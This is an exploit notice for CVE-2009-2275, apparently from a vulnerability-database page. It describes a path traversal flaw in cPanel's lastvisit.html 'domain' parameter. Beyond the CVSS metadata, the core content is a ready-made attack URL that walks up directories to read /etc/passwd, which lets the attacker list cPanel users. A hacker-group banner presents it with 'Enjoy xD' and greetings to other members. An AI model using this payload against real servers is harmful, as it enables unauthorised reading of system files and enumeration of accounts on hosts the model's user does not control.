Cpanel (lastvisit.html domain) Arbitrary File Disclosure Vuln (auth)

2009-07-02 / 2009-07-03
Credit: SEC-R1Z
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-2275
CWE: CWE-98


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _ / /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ / \ \_ _ _ _/ /___ / / __ | |) / | | / / \_ _ _ _/ /___ / / | __ || / | | / / _______\ \_ _ \ \2_0_0_9 | \ | | / /____ /_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!! | CPANEL USER BYPASS | | | | | | Author.: Black Dream | | Contact: Be5_at_HoTMail_dot_Fr | | HoMe : www.sec-r1z.com | | ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM | | | Script.: CPANEL | | Home...: http://CPANEL.NET | | | +-----------------------------------------------------------------------------------+ | | | [+] Exploit: | | | | http://r1z.com:2082/frontend/x3/stats/lastvisit.html?domain=../../../../../../../../ etc/ passwd | | | | | | | | | | | [+] Now you see all cpanel[s] user[s] | | | | [+] Enjoy xD | +-----------------------------------------------------------------------------------| | | | Greetz.: ~ His0k4 ~ j0rd4n14n.r1z ~ SimO-s0fT ~ S4s-T3rr0rist ~ Golden-Z3r0 | | Linux-D3v1L And All #sec-r1z memb3rz!!!! | E0D|F


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top